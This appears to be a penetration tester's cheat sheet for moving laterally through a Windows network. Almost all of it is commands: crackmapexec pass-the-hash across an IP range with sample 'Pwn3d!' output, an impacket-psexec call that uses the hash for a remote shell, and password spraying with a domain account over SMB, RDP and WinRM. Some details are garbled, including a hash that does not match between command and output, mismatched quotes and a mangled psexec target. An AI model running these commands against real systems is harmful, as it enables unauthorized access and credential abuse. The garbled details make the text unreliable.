crackmapexec smb -H ee0c207898a5bccc01f38115019ca2fb -u administrator --local-auth 10.21.1.20-24

• example output: SCLIENT\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!) - already compromised SCLIENT7\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!)
• impacket-psexec 'SCLIENT7/[email protected]' -hashes ':ee0c207898a5bccc01f38115019ca2fbtrew’

Also , when machine is part of Domain

• crackmapexec smb -p Test! -u sario -d NETMED 172.16.124.82-83

Other service

• RDP
  • crackmapexec rdp -p Test! -u sario -d NETMED 172.16.124.82-83
• Winrm
  • crackmapexec winrm -p Test! -u sario -d NETMED 172.16.124.82-83